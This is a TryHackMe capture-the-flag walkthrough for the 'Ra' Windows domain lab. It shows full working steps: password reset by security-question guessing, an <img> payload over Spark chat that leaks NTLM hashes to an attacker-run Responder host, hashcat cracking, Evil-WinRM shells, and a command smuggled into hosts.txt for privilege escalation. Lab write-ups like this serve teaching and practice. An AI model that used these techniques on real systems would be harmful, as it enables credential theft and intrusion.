Ra - TryHackMe Walkthrough
Ra - “You have found WindCorp’s internal network and their Domain Controller. Can you pwn their network?” This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.
URL: Ra
Difficulty: Hard
Author: 4ndr34zz
Story
You have gained access to the internal network of WindCorp, the multibillion dollar company, running an extensive social media campaign claiming to be unhackable (ha! so much for that claim!).
Next step would be to take their crown jewels and get full access to their internal network. You have spotted a new windows machine that may lead you to your end goal. Can you conquer this end boss and own their internal network?
Happy Hacking!
@4nqr34z and @theart42
Enumeration
We are given the IP 10.10.51.76, add it to /etc/hosts and run a portscan:
nmap -p- -A ra.thm -o portscan
PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Windcorp. 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name) 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | http-auth: | HTTP/1.1 401 Unauthorized\x0D | Negotiate |_ NTLM | http-ntlm-info: | Target_Name: WINDCORP | NetBIOS_Domain_Name: WINDCORP | NetBIOS_Computer_Name: FIRE | DNS_Domain_Name: windcorp.thm | DNS_Computer_Name: Fire.windcorp.thm | DNS_Tree_Name: windcorp.thm |_ Product_Version: 10.0.17763 |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Site doesn't have a title. | ssl-cert: Subject: commonName=Windows Admin Center | Subject Alternative Name: DNS:WIN-2FAA40QQ70B | Not valid before: 2020-04-30T14:41:03 |_Not valid after: 2020-06-30T14:41:02 |_ssl-date: 2020-07-28T13:43:48+00:00; -1s from scanner time. | tls-alpn: |_ http/1.1 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 2179/tcp open vmrdp? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: WINDCORP | NetBIOS_Domain_Name: WINDCORP | NetBIOS_Computer_Name: FIRE | DNS_Domain_Name: windcorp.thm | DNS_Computer_Name: Fire.windcorp.thm | DNS_Tree_Name: windcorp.thm | Product_Version: 10.0.17763 |_ System_Time: 2020-07-28T13:43:05+00:00 | ssl-cert: Subject: commonName=Fire.windcorp.thm | Not valid before: 2020-04-30T06:40:02 |_Not valid after: 2020-10-30T06:40:02 |_ssl-date: 2020-07-28T13:43:47+00:00; -1s from scanner time. 5222/tcp open jabber | fingerprint-strings: | RPCCheck: |_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream> | xmpp-info: | STARTTLS Failed | info: | unknown: | | stream_id: 915zwyjswx | auth_mechanisms: | | xmpp: | version: 1.0 | features: | | errors: | invalid-namespace | (timeout) | capabilities: | |_ compression_methods: 5223/tcp open ssl/hpvirtgrp? 5229/tcp open jaxflow? 5262/tcp open jabber | fingerprint-strings: | RPCCheck: |_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream> | xmpp-info: | STARTTLS Failed | info: | unknown: | | stream_id: 4vx13wz4gf | auth_mechanisms: | | xmpp: | version: 1.0 | features: | | errors: | invalid-namespace | (timeout) | capabilities: | |_ compression_methods: 5269/tcp open xmpp Wildfire XMPP Client | xmpp-info: | Respects server name | STARTTLS Failed | info: | unknown: | | stream_id: 345hqjca3g | auth_mechanisms: | | xmpp: | version: 1.0 | features: | | errors: | host-unknown | (timeout) | capabilities: | |_ compression_methods: 5270/tcp open ssl/xmp? 5276/tcp open ssl/unknown 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 7070/tcp open http Jetty 9.4.18.v20190429 |_http-server-header: Jetty(9.4.18.v20190429) |_http-title: Openfire HTTP Binding Service 7443/tcp open ssl/http Jetty 9.4.18.v20190429 |_http-server-header: Jetty(9.4.18.v20190429) |_http-title: Openfire HTTP Binding Service | ssl-cert: Subject: commonName=fire.windcorp.thm | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm | Not valid before: 2020-05-01T08:39:00 |_Not valid after: 2025-04-30T08:39:00 7777/tcp open socks5 (No authentication; connection not allowed by ruleset) | socks-auth-info: |_ No authentication 9090/tcp open zeus-admin? | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Date: Tue, 28 Jul 2020 13:40:53 GMT | Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT | Content-Type: text/html | Accept-Ranges: bytes | Content-Length: 115 | <html> | <head><title></title> | <meta http-equiv="refresh" content="0;URL=index.jsp"> | </head> | <body> | </body> | </html> | HTTPOptions: | HTTP/1.1 200 OK | Date: Tue, 28 Jul 2020 13:41:00 GMT | Allow: GET,HEAD,POST,OPTIONS | JavaRMI, drda, ibm-db2-das, informix: | HTTP/1.1 400 Illegal character CNTL=0x0 | Content-Type: text/html;charset=iso-8859-1 | Content-Length: 69 | Connection: close | <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre> | SqueezeCenter_CLI: | HTTP/1.1 400 No URI | Content-Type: text/html;charset=iso-8859-1 | Content-Length: 49 | Connection: close | <h1>Bad Message 400</h1><pre>reason: No URI</pre> | WMSRequest: | HTTP/1.1 400 Illegal character CNTL=0x1 | Content-Type: text/html;charset=iso-8859-1 | Content-Length: 69 | Connection: close |_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre> 9091/tcp open ssl/xmltec-xmlmail? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP: | HTTP/1.1 400 Illegal character CNTL=0x0 | Content-Type: text/html;charset=iso-8859-1 | Content-Length: 69 | Connection: close | <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre> | GetRequest: | HTTP/1.1 200 OK | Date: Tue, 28 Jul 2020 13:41:12 GMT | Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT | Content-Type: text/html | Accept-Ranges: bytes | Content-Length: 115 | <html> | <head><title></title> | <meta http-equiv="refresh" content="0;URL=index.jsp"> | </head> | <body> | </body> | </html> | HTTPOptions: | HTTP/1.1 200 OK | Date: Tue, 28 Jul 2020 13:41:12 GMT | Allow: GET,HEAD,POST,OPTIONS | Help: | HTTP/1.1 400 No URI | Content-Type: text/html;charset=iso-8859-1 | Content-Length: 49 | Connection: close | <h1>Bad Message 400</h1><pre>reason: No URI</pre> | RPCCheck: | HTTP/1.1 400 Illegal character OTEXT=0x80 | Content-Type: text/html;charset=iso-8859-1 | Content-Length: 71 | Connection: close | <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre> | RTSPRequest: | HTTP/1.1 400 Unknown Version | Content-Type: text/html;charset=iso-8859-1 | Content-Length: 58 | Connection: close | <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre> | SSLSessionReq: | HTTP/1.1 400 Illegal character CNTL=0x16 | Content-Type: text/html;charset=iso-8859-1 | Content-Length: 70 | Connection: close |_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre> | ssl-cert: Subject: commonName=fire.windcorp.thm | Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm | Not valid before: 2020-05-01T08:39:00 |_Not valid after: 2025-04-30T08:39:00 9389/tcp open mc-nmf .NET Message Framing 49669/tcp open msrpc Microsoft Windows RPC 49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49675/tcp open msrpc Microsoft Windows RPC 49676/tcp open msrpc Microsoft Windows RPC 49744/tcp open msrpc Microsoft Windows RPC 49910/tcp open msrpc Microsoft Windows RPC
A lot of ports open, let’s start with port 80:
http://ra.thm/
I found something interesting when analysing the web request for this site. I used the inspect element function of my browser and went to “network” (Firefox) to see if there was anything interesting when I entered a search query on the company portal.
Here is what I saw:
There seem to not a bunch of GET requests from “fire.windcorp.thm:9090” for images to display icons for “Our IT support-staff”. We can also see all the associated users to these. I will note these down in a .txt file.
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
- [email protected]
Let’s add this domain to our hosts file:
sudo nano /etc/hosts
Add fire.windcorp.thm to the file:
Let’s visit this new domain:
http://fire.windcorp.thm:9090
We have a login page for openfire. We can identify it is running Openfire, Version: 4.5.1 however, I couldn’t find any obvious vulnerabilities.
I also wanted to play around with the “forgotten password” function.
We have a few options about a security question, one of which is asking about a pet.
Under “Our Employees”, there is a woman named Lily Levesque who is with a dog.
I also remember seeing her image when inspecting the web requests - here is the file name:
lilyleAndSparky.jpg
It looks like her username could be lilyle and her dog is named Sparky.
We are able to reset her password to ChangeMe#1234.
This is a great example of how far enumeration can go when collecting information about your target(s). You can imagine how effective Social Enginnering could be in situations like this as well.
lilyle
These credentials did not work for the openfire service so I started to look for other services from our portscan.
We can see active directory (ldap) on port 389. Let’s try and use these credentials to view the possible shares on this system.
┌─[[email protected]]─[~/tryhackme/Ra] └──╼ $smbmap -u lilyle -p ChangeMe#1234 -H ra.thm [+] IP: ra.thm:445.. Name: unknown Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share Shared READ ONLY SYSVOL READ ONLY Logon server share Users READ ONLY
Have a look at the “Shared” directory:
┌─[✗]─[[email protected]]─[~/tryhackme/Ra] └──╼ $smbclient //ra.thm/Shared -U lilyle --password ChangeMe#1234 Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat May 30 01:45:42 2020 .. D 0 Sat May 30 01:45:42 2020 Flag 1.txt A 45 Fri May 1 16:32:36 2020 spark_2_8_3.deb A 29526628 Sat May 30 01:45:01 2020 spark_2_8_3.dmg A 99555201 Sun May 3 12:06:58 2020 spark_2_8_3.exe A 78765568 Sun May 3 12:05:56 2020 spark_2_8_3.tar.gz A 123216290 Sun May 3 12:07:24 2020 15587583 blocks of size 4096. 10897965 blocks available
We have our first flag and some files “spark”. I also saw that a port for jabber was open so these files are interesting. Download the spark package:
GET spark_2_8_3.deb sudo dpkg -i spark_2_8_3.deb spark
Now we have spark running on our local machine, we can try and use the credentials we found to log in to her account.
Make sure you check “Accept all certificates” and “Disable hostname verification” on advanced options.
We are logged in:
Since we are an authenticated user on spark, I straight away searched up exploits for spark.
I came across this interesting article on Github:
buse
Sending the following <img> would essentially reveal the NTLM hashes of the user that visits the link.
<img src=[external_ip]/test.img>
It looks like the user Buse is online:
His username is [email protected] so start a chat with him. We will be using Responder to listen for the NTLM hash. Please note, you will need to stop other services running to allow for responder to work (I had to close my SSH port for this to work).
sudo Responder -I tun0
Or, download the newest version from github:
git clone https://github.com/lgandx/Responder.git cd Responder sudo python3 Responder.py -I tun0
Now we can send the <img> tag to Buse:
<img src="http://10.9.6.63/fedai.jpg">
We got a hit!
[+] Listening for events... [HTTP] Sending NTLM authentication request to 10.10.97.155 [HTTP] GET request from: 10.10.97.155 URL: /fedai.jpg [HTTP] Host : 10.9.6.63 [HTTP] NTLMv2 Client : 10.10.97.155 [HTTP] NTLMv2 Username : WINDCORP\buse [HTTP] NTLMv2 Hash : buse::WINDCORP:438ba8a6154108d5:84D16DD38C8DD23952D518A3FDEB2F04:0101000000000000D27CA1B08F65D601928E5FABDAFA236E000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000001000000002000004962BEBF4B0492439D94E13699F51104AE7010E99EBF72263C47ACBD91DA470D0A00100000000000000000000000000000000000090000000000000000000000
I will now use hashcat to crack this NTLM hash. I will put this hash into a .txt file and use mode 1000 on hashcat to brute.
┌─[✗]─[[email protected]]─[~/tryhackme/Ra] └──╼ $hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt hashcat (v6.0.0) starting... OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ============================================================================================================================= * Device #1: pthread-Intel(R) Core(TM) i5-6500 CPU @ 3.20GHz, 2890/2954 MB (1024 MB allocatable), 4MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt ATTENTION! Pure (unoptimized) backend kernels selected. Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance. If you want to switch to optimized backend kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. Host memory required for this attack: 65 MB Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 BUSE::WINDCORP:8b11ab5cf6e9e098:222f76790a6fa3f4f6b22215dc4b32d3:01010000000000005672c2b08f65d601ed6cc48244ccb53c000000000200060053004d0042000100160053004d0042002d0054004f004f004c004b00490054000400120073006d0062002e006c006f00630061006c000300280073006500720076006500720032003000300033002e0073006d0062002e006c006f00630061006c000500120073006d0062002e006c006f00630061006c0008003000300000000000000001000000002000004962bebf4b0492439d94e13699f51104ae7010e99ebf72263c47acbd91da470d0a00100000000000000000000000000000000000090000000000000000000000:u*********1 Session..........: hashcat Status...........: Cracked Hash.Name........: NetNTLMv2 Hash.Target......: BUSE::WINDCORP:8b11ab5cf6e9e098:222f76790a6fa3f4f6b...000000 Time.Started.....: Wed Jul 29 11:11:02 2020 (3 secs) Time.Estimated...: Wed Jul 29 11:11:05 2020 (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 953.9 kH/s (1.94ms) @ Accel:1024 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 2961408/14344385 (20.65%) Rejected.........: 0/2961408 (0.00%) Restore.Point....: 2957312/14344385 (20.62%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: v10014318 -> utrox11 Started: Wed Jul 29 11:10:30 2020 Stopped: Wed Jul 29 11:11:07 2020
Since port 5985 is open, we can use Evil-WinRM to access the users account now that we have his credentials.
┌─[[email protected]]─[~/tryhackme/Ra] └──╼ $cat portscan | grep 5985 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Here is the repo for Evil-WinRM:
┌─[✗]─[[email protected]]─[~/Tools/evil-winrm] └──╼ $ruby evil-winrm.rb -i ra.thm -u buse -p u*********1 Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\buse\Documents> whoami windcorp\buse
Enumerate a bit, you will come across the “scripts” directory:
*Evil-WinRM* PS C:\> dir scripts
Directory: C:\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/3/2020 5:53 AM 4119 checkservers.ps1
-a---- 7/29/2020 3:36 AM 31 log.txt
log.txt gives a time of when “checkservers.ps1” was last run. This suggests that the .ps1 file is run quite often. Read through the script:
# Read the File with the Hosts every cycle, this way to can add/remove hosts
# from the list without touching the script/scheduled task,
# also hash/comment (#) out any hosts that are going for maintenance or are down.
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
It looks like it is reading the hosts file of brittanycr\hosts.txt.
Unfortunaly, we do not have access to view her files.
Let’s check what groups there are and what we are a part of;
*Evil-WinRM* PS C:\Users\brittanycr> whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes =========================================== ================ ============================================ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group WINDCORP\IT Group S-1-5-21-555431066-3599073733-176599750-5865 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Refer to this article to understand the different groups:
Active Directory Securtiy Groups - Microsoft Docs
Account Operators group grants limited account creation privileges to a user. This can essentially create and manage users and groups in the domain, including its own membership and that of the Server Operators group.
brittanycr
So, let’s change the password for brittanycr’s account. Please note, the password must meet password policy requirements.
Here is the AD password policy:
*Evil-WinRM* PS C:\Users\brittanycr> net user /domain brittanycr CyberGoat1234 The command completed successfully.
I actually tried to make a new user and add them to the Administrator group but I was denied access despite being an Account operator.
I continued down the brittanycr route and access her share with the following command:
┌─[✗]─[[email protected]]─[~/tryhackme/Ra] └──╼ $smbclient \\\\ra.thm\\Users -U brittanycr Enter WORKGROUP\brittanycr's password: CyberGoat1234
We can access the hosts.txt file now as we are authenticated as brittanycr.
GET hosts.txt
This is what the file contains:
┌─[[email protected]]─[~/tryhackme/Ra] └──╼ $cat hosts.txt google.com cisco.com
Since we couldn’t add a user to the Administrator group earlier, maybe we can do this by using the hosts.txt.
Privilege Escalation - GHANDI
I created a user called “ghandi” with the following command:
*Evil-WinRM* PS C:\Users\buse\Documents> net user ghandi CyberGoat1234 /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\buse\Documents> net localgroup Administrators ghandi /add
net.exe : System error 5 has occurred.
+ CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Access is denied.
As you can see, access is denied with trying to add ghandi to the Admin group. Let’s add that command to our hosts.txt and put it in the system for it to hopefully be executed.
┌─[[email protected]]─[~/tryhackme/Ra] └──╼ $cat hosts.txt google.com notadomain.ru; net localgroup Administrators ghandi /add
put hosts.txt
Now we can attempt to log in as ghandi:
evil-winrm -i ra.thm -u ghandi -p CyberGoat12345
We’re logged in as ghandi!
We gave ourselves admin rights so the rest is to find the last flag.
Thank you for reading.
